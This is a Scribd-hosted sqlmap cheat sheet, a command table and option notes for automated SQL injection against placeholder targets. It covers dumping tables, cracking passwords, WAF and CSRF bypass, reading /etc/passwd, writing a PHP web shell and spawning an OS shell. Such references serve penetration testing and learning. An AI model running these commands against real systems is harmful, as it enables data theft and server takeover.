Scribd
Upload
249 views2 pages

Sqlmap Cheatsheet

The document describes various commands and parameters that can be used with the sqlmap tool for automating SQL injection and database takeover. It provides examples of using sqlmap to test for SQL injection vulnerabilities, enumerate database and table information, dump database table contents, bypass web application firewalls and anti-CSRF tokens, leverage SQL injection to read and write local files, and spawn an operating system shell. The document also explains options for customizing the sqlmap behavior, such as specifying injection techniques, tampering scripts, and modifying detection settings to find more complex vulnerabilities.

Uploaded by

Anonymous (Akcent Hoong)
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
Download as txt, pdf, or txt
249 views2 pages

Sqlmap Cheatsheet

The document describes various commands and parameters that can be used with the sqlmap tool for automating SQL injection and database takeover. It provides examples of using sqlmap to test for SQL injection vulnerabilities, enumerate database and table information, dump database table contents, bypass web application firewalls and anti-CSRF tokens, leverage SQL injection to read and write local files, and spawn an operating system shell. The document also explains options for customizing the sqlmap behavior, such as specifying injection techniques, tampering scripts, and modifying detection settings to find more complex vulnerabilities.

Uploaded by

Anonymous (Akcent Hoong)
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1/ 2

| **Command** | **Description**

|
| ------------------------------------------------------------ |
----------------------------------------------------------- |
| `sqlmap -h` | View the basic
help menu |
| `sqlmap -hh` | View the advanced
help menu |
| `sqlmap -u "http://www.example.com/vuln.php?id=1" --batch` | Run `SQLMap`
without asking for user input |
| `sqlmap 'http://www.example.com/' --data 'uid=1&name=test'` | `SQLMap` with POST
request |
| `sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'` | POST request
specifying an injection point with an asterisk |
| `sqlmap -r req.txt` | Passing an HTTP
request file to `SQLMap` |
| `sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'` | Specifying a
cookie header |
| `sqlmap -u www.target.com --data='id=1' --method PUT` | Specifying a PUT
request |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt` |
Store traffic to an output file |
| `sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch` | Specify
verbosity level |
| `sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"` |
Specifying a prefix or suffix |
| `sqlmap -u www.example.com/?id=1 -v 3 --level=5` | Specifying the
level and risk |
| `sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --
is-dba` | Basic DB enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --tables -D testdb` | Table enumeration
|
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C
name,surname` | Table/row enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name
LIKE 'f%'"` | Conditional enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --schema` | Database schema
enumeration |
| `sqlmap -u "http://www.example.com/?id=1" --search -T user` | Searching for data
|
| `sqlmap -u "http://www.example.com/?id=1" --passwords --batch` | Password
enumeration and cracking |
| `sqlmap -u "http://www.example.com/" --data="id=1&csrf-
token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"` | Anti-CSRF
token bypass |
| `sqlmap --list-tampers` | List all tamper
scripts |
| `sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba` | Check for DBA
privileges |
| `sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"` | Reading a
local file |
| `sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest
"/var/www/html/shell.php"` | Writing a file
|
| `sqlmap -u "http://www.example.com/?id=1" --os-shell` | Spawning an OS
shell |

--batch = Never ask for user input, use the default behaviour
--dump = Dump DBMS database table entries
--dump-all = Dump all DBMS databases tables entries
--randomize=rp = To randomize value before being sent: E.g., sqlmap -u
"http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5 | grep URI
--proxy = Uses proxy E.g., proxy="socks4://177.39.187.70:33283"
--proxy-file = Uses a file containing a list of proxy
--skip-waf = Skips the initial WAF test
--random-agent = Uses a random user-agent
--chuncked = Splits the POST request's body into so-called "chunks"
--tamper = Uses tamper scripts E.g., --tamper=between,randomcase
--fresh-queries == redo queries for the single run

--technique = To specify the SQLi technique to be used E.g., --technique=BEU


B: Boolean-based blind
E: Error-based
U: Union query-based
S: Stacked queries
T: Time-based blind
Q: Inline queries

--eval = Uses python code to calculate parameter before it is sent E.g., sqlmap -u
"http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import
hashlib; h=hashlib.md5(id).hexdigest()" --batch -v 5 | grep URI

--level 5
--risk 5
By default, SQLMap combines a predefined set of most common boundaries (i.e.,
prefix/suffix pairs), along with the vectors having a high chance of success in
case of a vulnerable target.
Nevertheless, there is a possibility for users to use bigger sets of boundaries and
vectors, already incorporated into the SQLMap.
For such demands, the options --level and --risk should be used:

The option --level (1-5, default 1) extends both vectors and boundaries being used,
based on their expectancy of success (i.e., the lower the expectancy, the higher
the level).

The option --risk (1-3, default 1) extends the used vector set based on their risk
of causing problems at the target side (i.e., risk of database entry loss or
denial-of-service).

--union-cols=X
--union-char='x'
In some cases, UNION SQLi payloads require extra user-provided information to work.
If we can manually find the exact number of columns of the vulnerable SQL query, we
can provide this number to SQLMap with the option --union-cols (e.g. --union-
cols=17). In case that the default "dummy" filling values used by SQLMap -NULL and
random integer- are not compatible with values from results of the vulnerable SQL
query, we can specify an alternative value instead (e.g. --union-char='a').

You might also like